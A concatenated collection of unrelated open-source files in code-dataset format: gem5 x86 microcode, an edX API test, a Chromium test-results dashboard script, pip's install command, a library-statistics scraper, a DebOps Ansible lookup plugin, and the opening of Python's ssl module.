ldfp xmmh, seg, riprel, disp, dataSize=8
};
def macroop UNPCKHPS_XMM_XMM {
unpack xmml, xmmh, xmmhm, ext=0, size=4
unpack xmmh, xmmh, xmmhm, ext=1, size=4
};
def macroop UNPCKHPS_XMM_M {
lea t1, seg, sib, disp, dataSize=asz
ldfp ufp1, seg, [1, t0, t1], 8, dataSize=8
unpack xmml, xmmh, ufp1, ext=0, size=4
unpack xmmh, xmmh, ufp1, ext=1, size=4
};
def macroop UNPCKHPS_XMM_P {
rdip t7
lea t1, seg, riprel, disp, dataSize=asz
ldfp ufp1, seg, [1, t0, t1], 8, dataSize=8
unpack xmml, xmmh, ufp1, ext=0, size=4
unpack xmmh, xmmh, ufp1, ext=1, size=4
};
def macroop UNPCKHPD_XMM_XMM {
movfp xmml, xmmh
movfp xmmh, xmmhm
};
def macroop UNPCKHPD_XMM_M {
lea t1, seg, sib, disp, dataSize=asz
ldfp ufp1, seg, [1, t0, t1], 8, dataSize=8
movfp xmml, xmmh
movfp xmmh, ufp1
};
def macroop UNPCKHPD_XMM_P {
rdip t7
lea t1, seg, riprel, disp, dataSize=asz
ldfp ufp1, seg, [1, t0, t1], 8, dataSize=8
movfp xmml, xmmh
movfp xmmh, ufp1
};
'''
| bsd-3-clause |
cyanna/edx-platform | common/djangoapps/course_about/tests/test_api.py | 19 | 1861 | """
Tests the logical Python API layer of the Course About API.
"""
import ddt
import json
import unittest
from django.core.urlresolvers import reverse
from rest_framework.test import APITestCase
from rest_framework import status
from django.conf import settings
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, CourseAboutFactory
from student.tests.factories import UserFactory
@ddt.ddt
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
class CourseInfoTest(ModuleStoreTestCase, APITestCase):
"""
Test course information.
"""
USERNAME = "Bob"
EMAIL = "bob@example.com"
PASSWORD = "edx"
def setUp(self):
""" Create a course"""
super(CourseInfoTest, self).setUp()
self.course = CourseFactory.create()
self.user = UserFactory.create(username=self.USERNAME, email=self.EMAIL, password=self.PASSWORD)
self.client.login(username=self.USERNAME, password=self.PASSWORD)
def test_get_course_details_from_cache(self):
kwargs = dict()
kwargs["course_id"] = self.course.id
kwargs["course_runtime"] = self.course.runtime
kwargs["user_id"] = self.user.id
CourseAboutFactory.create(**kwargs)
resp = self.client.get(
reverse('courseabout', kwargs={"course_id": unicode(self.course.id)})
)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp_data = json.loads(resp.content)
self.assertIsNotNone(resp_data)
resp = self.client.get(
reverse('courseabout', kwargs={"course_id": unicode(self.course.id)})
)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp_data = json.loads(resp.content)
self.assertIsNotNone(resp_data)
| agpl-3.0 |
geminy/aidear | oss/qt/qt-everywhere-opensource-src-5.9.0/qtwebengine/src/3rdparty/chromium/third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/generate_results_dashboard.py | 7 | 7696 | # Copyright (C) 2014 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
class ProcessJsonData(object):
def __init__(self, current_result_json_dict, old_failing_results_list, old_full_results_list):
self._current_result_json_dict = current_result_json_dict
self._old_failing_results_list = old_failing_results_list
self._old_full_results_list = old_full_results_list
self._final_result = []
def _get_test_result(self, test_result_data):
actual = test_result_data['actual']
expected = test_result_data['expected']
if actual == 'SKIP':
return actual
if actual == expected:
return 'HASSTDERR' if test_result_data.get('has_stderr') == 'true' else 'PASS'
else:
return actual
def _recurse_json_object(self, json_object, key_list):
for key in key_list:
try:
json_object = json_object[key]
except KeyError:
return 'NOTFOUND'
return self._get_test_result(json_object)
def _process_previous_json_results(self, key_list):
row = []
length = len(self._old_failing_results_list)
for index in range(0, length):
result = self._recurse_json_object(self._old_failing_results_list[index]["tests"], key_list)
if result == 'NOTFOUND':
result = self._recurse_json_object(self._old_full_results_list[index]["tests"], key_list)
row.append(result)
return row
def _add_archived_result(self, json_object, result):
json_object['archived_results'] = result
def _process_json_object(self, json_object, keyList):
for key, subdict in json_object.iteritems():
if isinstance(subdict, dict):
self._process_json_object(subdict, keyList + [key])
else:
row = [self._get_test_result(json_object)]
row += self._process_previous_json_results(keyList)
json_object.clear()
self._add_archived_result(json_object, row)
return
def generate_archived_result(self):
for key in self._current_result_json_dict["tests"]:
self._process_json_object(self._current_result_json_dict["tests"][key], [key])
return self._current_result_json_dict
class DashBoardGenerator(object):
def __init__(self, port):
self._port = port
self._filesystem = port.host.filesystem
self._results_directory = self._port.results_directory()
self._results_directory_path = self._filesystem.dirname(self._results_directory)
self._current_result_json_dict = {}
self._old_failing_results_list = []
self._old_full_results_list = []
self._final_result = []
def _add_individual_result_links(self, results_directories):
archived_results_file_list = [(file + '/results.html') for file in results_directories]
archived_results_file_list.insert(0, 'results.html')
self._current_result_json_dict['result_links'] = archived_results_file_list
def _copy_dashboard_html(self):
dashboard_file = self._filesystem.join(self._results_directory, 'dashboard.html')
dashboard_html_file_path = self._filesystem.join(
self._port.layout_tests_dir(), 'fast/harness/archived-results-dashboard.html')
if not self._filesystem.exists(dashboard_file):
if self._filesystem.exists(dashboard_html_file_path):
self._filesystem.copyfile(dashboard_html_file_path, dashboard_file)
def _initialize(self):
file_list = self._filesystem.listdir(self._results_directory_path)
results_directories = []
for dir in file_list:
full_dir_path = self._filesystem.join(self._results_directory_path, dir)
if self._filesystem.isdir(full_dir_path):
if self._results_directory in full_dir_path:
results_directories.append(full_dir_path)
results_directories.sort(reverse=True, key=lambda x: self._filesystem.mtime(x))
current_failing_results_json_file = self._filesystem.join(results_directories[0], 'failing_results.json')
input_json_string = self._filesystem.read_text_file(current_failing_results_json_file)
input_json_string = input_json_string[12:-2] # Remove preceding string ADD_RESULTS( and ); at the end
self._current_result_json_dict['tests'] = json.loads(input_json_string)['tests']
results_directories = results_directories[1:]
# To add hyperlink to individual results.html
self._add_individual_result_links(results_directories)
# Load the remaining stale layout test results Json's to create the dashboard
for json_file in results_directories:
failing_json_file_path = self._filesystem.join(json_file, 'failing_results.json')
full_json_file_path = self._filesystem.join(json_file, 'full_results.json')
json_string = self._filesystem.read_text_file(failing_json_file_path)
json_string = json_string[12:-2] # Remove preceding string ADD_RESULTS( and ); at the end
self._old_failing_results_list.append(json.loads(json_string))
json_string_full_result = self._filesystem.read_text_file(full_json_file_path)
self._old_full_results_list.append(json.loads(json_string_full_result))
self._copy_dashboard_html()
def generate(self):
self._initialize()
# There must be at least one archived result to be processed
if self._current_result_json_dict:
process_json_data = ProcessJsonData(self._current_result_json_dict,
self._old_failing_results_list, self._old_full_results_list)
self._final_result = process_json_data.generate_archived_result()
final_json = json.dumps(self._final_result)
final_json = 'ADD_RESULTS(' + final_json + ');'
archived_results_file_path = self._filesystem.join(self._results_directory, 'archived_results.json')
self._filesystem.write_text_file(archived_results_file_path, final_json)
| gpl-3.0 |
yhoshino11/pytest_example | .tox/py27/lib/python2.7/site-packages/pip/commands/install.py | 31 | 16307 | from __future__ import absolute_import
import logging
import operator
import os
import tempfile
import shutil
import warnings
from pip.req import InstallRequirement, RequirementSet, parse_requirements
from pip.locations import build_prefix, virtualenv_no_global, distutils_scheme
from pip.basecommand import Command
from pip.index import PackageFinder
from pip.exceptions import (
InstallationError, CommandError, PreviousBuildDirError,
)
from pip import cmdoptions
from pip.utils.build import BuildDirectory
from pip.utils.deprecation import RemovedInPip7Warning, RemovedInPip8Warning
logger = logging.getLogger(__name__)
class InstallCommand(Command):
"""
Install packages from:
- PyPI (and other indexes) using requirement specifiers.
- VCS project urls.
- Local project directories.
- Local or remote source archives.
pip also supports installing from "requirements files", which provide
an easy way to specify a whole environment to be installed.
"""
name = 'install'
usage = """
%prog [options] <requirement specifier> [package-index-options] ...
%prog [options] -r <requirements file> [package-index-options] ...
%prog [options] [-e] <vcs project url> ...
%prog [options] [-e] <local project path> ...
%prog [options] <archive url/path> ..."""
summary = 'Install packages.'
def __init__(self, *args, **kw):
super(InstallCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(cmdoptions.editable.make())
cmd_opts.add_option(cmdoptions.requirements.make())
cmd_opts.add_option(cmdoptions.build_dir.make())
cmd_opts.add_option(
'-t', '--target',
dest='target_dir',
metavar='dir',
default=None,
help='Install packages into <dir>. '
'By default this will not replace existing files/folders in '
'<dir>. Use --upgrade to replace existing packages in <dir> '
'with new versions.'
)
cmd_opts.add_option(
'-d', '--download', '--download-dir', '--download-directory',
dest='download_dir',
metavar='dir',
default=None,
help=("Download packages into <dir> instead of installing them, "
"regardless of what's already installed."),
)
cmd_opts.add_option(cmdoptions.download_cache.make())
cmd_opts.add_option(cmdoptions.src.make())
cmd_opts.add_option(
'-U', '--upgrade',
dest='upgrade',
action='store_true',
help='Upgrade all specified packages to the newest available '
'version. This process is recursive regardless of whether '
'a dependency is already satisfied.'
)
cmd_opts.add_option(
'--force-reinstall',
dest='force_reinstall',
action='store_true',
help='When upgrading, reinstall all packages even if they are '
'already up-to-date.')
cmd_opts.add_option(
'-I', '--ignore-installed',
dest='ignore_installed',
action='store_true',
help='Ignore the installed packages (reinstalling instead).')
cmd_opts.add_option(cmdoptions.no_deps.make())
cmd_opts.add_option(
'--no-install',
dest='no_install',
action='store_true',
help="DEPRECATED. Download and unpack all packages, but don't "
"actually install them."
)
cmd_opts.add_option(
'--no-download',
dest='no_download',
action="store_true",
help="DEPRECATED. Don't download any packages, just install the "
"ones already downloaded (completes an install run with "
"--no-install).")
cmd_opts.add_option(cmdoptions.install_options.make())
cmd_opts.add_option(cmdoptions.global_options.make())
cmd_opts.add_option(
'--user',
dest='use_user_site',
action='store_true',
help="Install to the Python user install directory for your "
"platform. Typically ~/.local/, or %APPDATA%\Python on "
"Windows. (See the Python documentation for site.USER_BASE "
"for full details.)")
cmd_opts.add_option(
'--egg',
dest='as_egg',
action='store_true',
help="Install packages as eggs, not 'flat', like pip normally "
"does. This option is not about installing *from* eggs. "
"(WARNING: Because this option overrides pip's normal install"
" logic, requirements files may not behave as expected.)")
cmd_opts.add_option(
'--root',
dest='root_path',
metavar='dir',
default=None,
help="Install everything relative to this alternate root "
"directory.")
cmd_opts.add_option(
"--compile",
action="store_true",
dest="compile",
default=True,
help="Compile py files to pyc",
)
cmd_opts.add_option(
"--no-compile",
action="store_false",
dest="compile",
help="Do not compile py files to pyc",
)
cmd_opts.add_option(cmdoptions.use_wheel.make())
cmd_opts.add_option(cmdoptions.no_use_wheel.make())
cmd_opts.add_option(
'--pre',
action='store_true',
default=False,
help="Include pre-release and development versions. By default, "
"pip only finds stable versions.")
cmd_opts.add_option(cmdoptions.no_clean.make())
index_opts = cmdoptions.make_option_group(
cmdoptions.index_group,
self.parser,
)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def _build_package_finder(self, options, index_urls, session):
"""
Create a package finder appropriate to this install command.
This method is meant to be overridden by subclasses, not
called directly.
"""
return PackageFinder(
find_links=options.find_links,
index_urls=index_urls,
use_wheel=options.use_wheel,
allow_external=options.allow_external,
allow_unverified=options.allow_unverified,
allow_all_external=options.allow_all_external,
trusted_hosts=options.trusted_hosts,
allow_all_prereleases=options.pre,
process_dependency_links=options.process_dependency_links,
session=session,
)
def run(self, options, args):
if (
options.no_install or
options.no_download
):
warnings.warn(
"--no-install and --no-download are deprecated. "
"See https://github.com/pypa/pip/issues/906.",
RemovedInPip7Warning,
)
# If we have --no-install or --no-download and no --build we use the
# legacy static build dir
if (options.build_dir is None and
(options.no_install or options.no_download)):
options.build_dir = build_prefix
if options.download_dir:
options.no_install = True
options.ignore_installed = True
if options.build_dir:
options.build_dir = os.path.abspath(options.build_dir)
options.src_dir = os.path.abspath(options.src_dir)
install_options = options.install_options or []
if options.use_user_site:
if virtualenv_no_global():
raise InstallationError(
"Can not perform a '--user' install. User site-packages "
"are not visible in this virtualenv."
)
install_options.append('--user')
temp_target_dir = None
if options.target_dir:
options.ignore_installed = True
temp_target_dir = tempfile.mkdtemp()
options.target_dir = os.path.abspath(options.target_dir)
if (os.path.exists(options.target_dir) and not
os.path.isdir(options.target_dir)):
raise CommandError(
"Target path exists but is not a directory, will not "
"continue."
)
install_options.append('--home=' + temp_target_dir)
global_options = options.global_options or []
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.info('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
if options.use_mirrors:
warnings.warn(
"--use-mirrors has been deprecated and will be removed in the "
"future. Explicit uses of --index-url and/or --extra-index-url"
" is suggested.",
RemovedInPip7Warning,
)
if options.mirrors:
warnings.warn(
"--mirrors has been deprecated and will be removed in the "
"future. Explicit uses of --index-url and/or --extra-index-url"
" is suggested.",
RemovedInPip7Warning,
)
index_urls += options.mirrors
if options.download_cache:
warnings.warn(
"--download-cache has been deprecated and will be removed in "
"the future. Pip now automatically uses and configures its "
"cache.",
RemovedInPip8Warning,
)
with self._build_session(options) as session:
finder = self._build_package_finder(options, index_urls, session)
build_delete = (not (options.no_clean or options.build_dir))
with BuildDirectory(options.build_dir,
delete=build_delete) as build_dir:
requirement_set = RequirementSet(
build_dir=build_dir,
src_dir=options.src_dir,
download_dir=options.download_dir,
upgrade=options.upgrade,
as_egg=options.as_egg,
ignore_installed=options.ignore_installed,
ignore_dependencies=options.ignore_dependencies,
force_reinstall=options.force_reinstall,
use_user_site=options.use_user_site,
target_dir=temp_target_dir,
session=session,
pycompile=options.compile,
isolated=options.isolated_mode,
)
for name in args:
requirement_set.add_requirement(
InstallRequirement.from_line(
name, None, isolated=options.isolated_mode,
)
)
for name in options.editables:
requirement_set.add_requirement(
InstallRequirement.from_editable(
name,
default_vcs=options.default_vcs,
isolated=options.isolated_mode,
)
)
for filename in options.requirements:
for req in parse_requirements(
filename,
finder=finder, options=options, session=session):
requirement_set.add_requirement(req)
if not requirement_set.has_requirements:
opts = {'name': self.name}
if options.find_links:
msg = ('You must give at least one requirement to '
'%(name)s (maybe you meant "pip %(name)s '
'%(links)s"?)' %
dict(opts, links=' '.join(options.find_links)))
else:
msg = ('You must give at least one requirement '
'to %(name)s (see "pip help %(name)s")' % opts)
logger.warning(msg)
return
try:
if not options.no_download:
requirement_set.prepare_files(finder)
else:
# This is the only call site of locate_files. Nuke with
# fire.
requirement_set.locate_files()
if not options.no_install:
requirement_set.install(
install_options,
global_options,
root=options.root_path,
)
reqs = sorted(
requirement_set.successfully_installed,
key=operator.attrgetter('name'))
items = []
for req in reqs:
item = req.name
try:
if hasattr(req, 'installed_version'):
if req.installed_version:
item += '-' + req.installed_version
except Exception:
pass
items.append(item)
installed = ' '.join(items)
if installed:
logger.info('Successfully installed %s', installed)
else:
downloaded = ' '.join([
req.name
for req in requirement_set.successfully_downloaded
])
if downloaded:
logger.info(
'Successfully downloaded %s', downloaded
)
except PreviousBuildDirError:
options.no_clean = True
raise
finally:
# Clean up
if ((not options.no_clean) and
((not options.no_install) or
options.download_dir)):
requirement_set.cleanup_files()
if options.target_dir:
if not os.path.exists(options.target_dir):
os.makedirs(options.target_dir)
lib_dir = distutils_scheme('', home=temp_target_dir)['purelib']
for item in os.listdir(lib_dir):
target_item_dir = os.path.join(options.target_dir, item)
if os.path.exists(target_item_dir):
if not options.upgrade:
logger.warning(
'Target directory %s already exists. Specify '
'--upgrade to force replacement.',
target_item_dir
)
continue
if os.path.islink(target_item_dir):
logger.warning(
'Target directory %s already exists and is '
'a link. Pip will not automatically replace '
'links, please remove if replacement is '
'desired.',
target_item_dir
)
continue
if os.path.isdir(target_item_dir):
shutil.rmtree(target_item_dir)
else:
os.remove(target_item_dir)
shutil.move(
os.path.join(lib_dir, item),
target_item_dir
)
shutil.rmtree(temp_target_dir)
return requirement_set
| mit |
glaserti/LibraryTwitter | Python/1 - CSV from HTMLsource.py | 1 | 7213 | #
# Scraping website for information about libraries
#
# For getting information about the libraries, the database of the German Library Statistics (Deutsche Bibliotheksstatistik/DBS) which is hosted by the HBZ was used:
#
# http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/bibs.php
#
# For this project, 4 different requests were made:
#
# 1. DBS National Libraries ( == > 3 active<sup>(1)</sup> libraries)
# 1. DBS Section 4: University Libraries (i.e. not the entire Section 4 was queried) ( == > 83 active<sup>(2)</sup> libraries)
# 1. DBS Section 1: Public Libraries with population > 400,000 ( == > 18 libraries)<sup>(3)</sup>
# 1. DBS Section 2: Public Libraries with population > 100,000 ( == > 81 libraries)<sup>(4)</sup>
#
# Since the website doesn't give unique URLs for individual requests,
# you could download the source code of each database request and safe as html files.
#
# However, you could use the _printing page_ of the database result list, which returns
# an individual URL. This procedure is followed here, with the URLs given in the list of tuples "urlList".
#
# The result will be saved as a csv file for each database request to the cwd (i.e. current working directory).<sup>(5)</sup>
# Furthermore, those libraries without a valid url will be printed out (in a JSON prettyprint style).
#
# ---
#
# <sup>(1)</sup> In DBS National Libraries, there are actually four libraries listed, but one is inactive.
#
# <sup>(2)</sup> In DBS Section 4: University Libraries, there are actually 84 libraries listed, but one is inactive.
#
# <sup>(3)</sup> Two libraries were added manually to this goup of libraries: The Hamburger Bücherhallen, whose entry in DBS omitted the DBV Section, and the Zentral- und Landesbibliothek Berlin, which was listed as member of Section 4 "Wissenschaftliche Universalbibliotheken", though the library is member of Section 1 (and only guest member of Section 4 according to the DBV webpage (http://www.bibliotheksverband.de/mitglieder/).
#
# <sup>(4)</sup> From DBS Section 2, two libraries (KA119 and KA129) were removed: These are small "ehrenamtlich geführte" libraries (less than 1,000 books) without any presence on the internet.
# For two more libraries (MB026 and GY440) the urls, missing in the DBS, were added manually.
#
# <sup>(5)</sup> To find out, what your cwd is, type:
#
# >```import os
# >print os.getcwd()```
#
# ---
#
# Data was collected: 2014-02-08
#
# List of URLs
#
# List of tuples of name & url
# urlList[0] = Nr. 1 (DBS National Libraries)
# urlList[1] = Nr. 2 (DBS Section 4, University Libraries)
# urlList[2] = Nr. 3 (DBS Section 1)
# urlList[3] = Nr. 4 (DBS Section 2)
urlList = [('DBS_NatBib', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AG012|AG292|AG000|AK001'),
('DBS_4_UB', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=EM482|AH715|EJ882|EX035|AA708|AG188|DB900|DE081|AD011|DB079|AF093|AH090|AA289|MM201|AF007|EL283|AJ082|AB294|AD291|AE088|AX001|AA046|AC018|AB105|AA083|EL131|AE830|AL091|AE027|BK213|AX566|AL352|AK517|EX461|AL005|AL017|AG061|AC006|AE003|AB038|AK384|AD473|AH703|AB361|AD084|AK104|AF020|AA290|DE100|SB005|AL029|AK025|AB026|AA009|AH089|AH016|AN087|AJ100|EL039|AC030|AE386|AA034|AJ008|BD987|AE015|BD296|AH077|AE180|AH004|AF019|AK700|AH466|AH739|AJ355|AH028|AL467|AB385|AJ021|BZ398|AC468|DC072|DA385|BE926|FH880'),
('DBS_1', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AJ197|GE486|AA381|AE131|AH478|AJ136|AE064|AK062|AG115|AB075|AJ380|AL480|AH132|AA277|AE362|AE106'),
('DBS_2', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AF111|MB026|GB291|AH259|GC556|KA119|KA129|GD895|AJ367|AF238|AD242|AD072|AG243|GY440|AA186|AB063|AH181|AD369|AC134|AF135|GE231|KS124|AL285|AF196|KQ152|AK116|AG279|AE295|AD217|GD822|AK153|GM675|AG267|AK293|AC286|AB178|AF275|AJ033|AL157|AC122|AJ471|WB861|LD510|GC283|AD059|MB038|AA174|AG371|AG231|LC499|LC505|AJ069|AG073|GB850|WB782|MB014|AH260|AH168|GC301|AJ264|GD998|GE012|GE036|MB002|GD767|AD163|AH351|AC262|GA444|GE462|GB746|AA472|GE899|AH247|AA447|AB270|GE164|GA596|AH284|AF470|AB142|AD229|JA868')]
#
# Functions
#
from bs4 import BeautifulSoup
import urllib2
import json
import csv
def writeDict(bsString):
s = bsString.lstrip() # stripping off leading whitespace
i1 = s.find("(DBS-ID: ")
i2 = i1 + len("(DBS-ID: ")
i3 = s.find(", Sig.") # if there is no Sig. given, i3 returns -1 [i.e. the closing paren ")"]
name = s[:i1-1]
i4 = name.find(' ') # to get the place, split name at first white space
dbsID = s[i2:i3]
place = name[:i4]
dic = {}
dic['DBS-ID'] = dbsID.encode("utf-8") # BeautifulSoup encodes in Unicode,
dic['Name'] = name.encode("utf-8") # which is not supported by csv;
dic['Ort'] = place.encode("utf-8") # hence encoding to utf-8 is necessary
dic['Twitter'] = ''
return dic
def findURL(soupTAG):
urlTAG = soupTAG.find_next("a")
url = urlTAG.get('href')
d = {}
d['URL'] = url.encode("utf-8")
return d
def parseHTML(soupHTML):
l = []
loD = []
s0 = soupHTML.table.table.h3
while type(s0) != type(None): # first write each entry which is not NoneType to a list
l.append(s0)
s_next = s0.find_next("h3")
s0 = s_next
for i in l:
url = findURL(i) # finding the next url for each entry
si = i.string # second write each string of the list which is not NoneType
if type(si) != type(None): # to a List of Dictionaries
di = writeDict(si)
di.update(url) # adding the url to the dict
loD.append(di)
else:
pass
return loD
def libCSV(index_of_urlList):
'''
pass as argument the index number of the urlList
prints out
(1.) Nr. of (active) libraries in the list
(2.) A JSON prettyprint list of libraries without a valid url
(3.) The name of the csv file.
Saves the csv file in the cwd.
'''
tup = urlList[index_of_urlList]
u = tup[1]
web = urllib2.urlopen(u)
webHTML = web.read()
web.close()
soup = BeautifulSoup(webHTML)
result = parseHTML(soup)
print 'For', tup[0], len(result), '(active) libraries could be found.'
for i in result:
if i["URL"] == "":
print 'For this library no URL could be found: \n'
print json.dumps(i, indent=1), '\n'
filename = tup[0] + '.csv'
l1 = len(filename) + len('The csv will be safed as ')
print "\n"+ l1*"=" + "\n"
print 'The csv will be safed as', filename
return exp2CSV(result, filename)
def exp2CSV(listOfDict, filename):
'''
arguments = list of dictionaries, filename
output = saves file to cwd (current working directory)
'''
outputfile = filename
keyz = listOfDict[0].keys()
f = open(outputfile,'w')
dict_writer = csv.DictWriter(f,keyz)
dict_writer.writer.writerow(keyz)
dict_writer.writerows(listOfDict)
f.close()
| mit |
umeboshi2/debops-playbooks | playbooks/lookup_plugins/template_src.py | 6 | 5609 | # (c) 2015, Robert Chady <rchady@sitepen.com>
# Based on `runner/lookup_plugins/file.py` for Ansible
# (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Debops.
# This file is NOT part of Ansible yet.
#
# Debops is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Debops. If not, see <http://www.gnu.org/licenses/>.
'''
This file implements the `template_src` lookup filter for Ansible. In difference
to the `template` filter, this searches values based on the `template-paths`
variable (colon separated) as configured in DebOps.
NOTE: This means this filter relies on DebOps.
'''
import os
from debops import *
from debops.cmds import *
__author__ = "Robert Chady <rchady@sitepen.com>"
__copyright__ = "Copyright 2015 by Robert Chady <rchady@sitepen.com>"
__license__ = "GNU General Public LIcense version 3 (GPL v3) or later"
conf_template_paths = 'template-paths'
from distutils.version import LooseVersion
from ansible import __version__ as __ansible_version__
class LookupModule(object):
def __new__(class_name, *args, **kwargs):
if LooseVersion(__ansible_version__) < LooseVersion("2.0"):
from ansible import utils, errors
class LookupModuleV1(object):
def __init__(self, basedir, *args, **kwargs):
self.basedir = basedir
def run(self, terms, inject=None, **kwargs):
terms = utils.listify_lookup_plugin_terms(terms, self.basedir, inject)
ret = []
# this can happen if the variable contains a string, strictly not desired for lookup
# plugins, but users may try it, so make it work.
if not isinstance(terms, list):
terms = [ terms ]
project_root = find_debops_project(required=False)
config = read_config(project_root)
places = []
if 'paths' in config and conf_template_paths in config['paths']:
custom_places = config['paths'][conf_template_paths].split(':')
for custom_path in custom_places:
if os.path.isabs(custom_path):
places.append(custom_path)
else:
places.append(os.path.join(project_root, custom_path))
for term in terms:
if '_original_file' in inject:
relative_path = utils.path_dwim_relative(inject['_original_file'], 'templates', '', self.basedir, check=False)
places.append(relative_path)
for path in places:
template = os.path.join(path, term)
if template and os.path.exists(template):
ret.append(template)
break
else:
raise errors.AnsibleError("could not locate file in lookup: %s" % term)
return ret
return LookupModuleV1(*args, **kwargs)
else:
from ansible.errors import AnsibleError
from ansible.plugins.lookup import LookupBase
class LookupModuleV2(LookupBase):
def run(self, terms, variables=None, **kwargs):
ret = []
# this can happen if the variable contains a string, strictly not desired for lookup
# plugins, but users may try it, so make it work.
if not isinstance(terms, list):
terms = [ terms ]
project_root = find_debops_project(required=False)
config = read_config(project_root)
places = []
if 'paths' in config and conf_template_paths in config['paths']:
custom_places = config['paths'][conf_template_paths].split(':')
for custom_path in custom_places:
if os.path.isabs(custom_path):
places.append(custom_path)
else:
places.append(os.path.join(project_root, custom_path))
for term in terms:
if 'role_path' in variables:
relative_path = self._loader.path_dwim_relative(variables['role_path'], 'templates', '')
places.append(relative_path)
for path in places:
template = os.path.join(path, term)
if template and os.path.exists(template):
ret.append(template)
break
else:
raise AnsibleError("could not locate file in lookup: %s" % term)
return ret
return LookupModuleV2(*args, **kwargs)
| gpl-3.0 |
jlnaudin/x-drone | MissionPlanner-master/packages/IronPython.StdLib.2.7.4/content/Lib/ssl.py | 74 | 15611 | # Wrapper module for _ssl, providing some additional facilities
# implemented in Python. Written by Bill Janssen.
"""\
This module provides some more Pythonic support for SSL.
Object types:
SSLSocket -- subtype of socket.socket which does SSL over the socket
Exceptions:
SSLError -- exception raised for I/O errors
Functions:
cert_time_to_seconds -- convert time string used for certificate
notBefore and notAfter functions to integer
seconds past the Epoch (the time values
returned from time.time())
fetch_server_certificate (HOST, PORT) -- fetch the certificate provided
by the server running on HOST at port PORT. No
validation of the certificate is performed.
Integer constants:
SSL_ERROR_ZERO_RETURN
SSL_ERROR_WANT_READ
SSL_ERROR_WANT_WRITE
SSL_ERROR_WANT_X509_LOOKUP
SSL_ERROR_SYSCALL
SSL_ERROR_SSL
SSL_ERROR_WANT_CONNECT
SSL_ERROR_EOF
SSL_ERROR_INVALID_ERROR_CODE
The following group define certificate requirements that one side is
allowing/requiring from the other side:
CERT_NONE - no certificates from the other side are required (or will
be looked at if provided)
CERT_OPTIONAL - certificates are not required, but if provided will be
validated, and if validation fails, the connection will
also fail
CERT_REQUIRED - certificates are required, and will be validated, and
if validation fails, the connection will also fail
The following constants identify various SSL protocol variants:
PROTOCOL_SSLv2
PROTOCOL_SSLv3
PROTOCOL_SSLv23
PROTOCOL_TLSv1
"""
import textwrap
import _ssl # if we can't import it, let the error propagate
from _ssl import OPENSSL_VERSION_NUMBER, OPENSSL_VERSION_INFO, OPENSSL_VERSION
from _ssl import SSLError
from _ssl import CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED
from _ssl import RAND_status, RAND_egd, RAND_add
from _ssl import \
SSL_ERROR_ZERO_RETURN, \
SSL_ERROR_WANT_READ, \
SSL_ERROR_WANT_WRITE, \
SSL_ERROR_WANT_X509_LOOKUP, \
SSL_ERROR_SYSCALL, \
SSL_ERROR_SSL, \
SSL_ERROR_WANT_CONNECT, \
SSL_ERROR_EOF, \
SSL_ERROR_INVALID_ERROR_CODE
from _ssl import PROTOCOL_SSLv3, PROTOCOL_SSLv23, PROTOCOL_TLSv1
_PROTOCOL_NAMES = {
PROTOCOL_TLSv1: "TLSv1",
PROTOCOL_SSLv23: "SSLv23",
PROTOCOL_SSLv3: "SSLv3",
}
try:
from _ssl import PROTOCOL_SSLv2
except ImportError:
pass
else:
_PROTOCOL_NAMES[PROTOCOL_SSLv2] = "SSLv2"
from socket import socket, _fileobject, _delegate_methods, error as socket_error
from socket import getnameinfo as _getnameinfo
import base64 # for DER-to-PEM translation
import errno
class SSLSocket(socket):
"""This class implements a subtype of socket.socket that wraps
the underlying OS socket in an SSL context when necessary, and
provides read and write methods over that channel."""
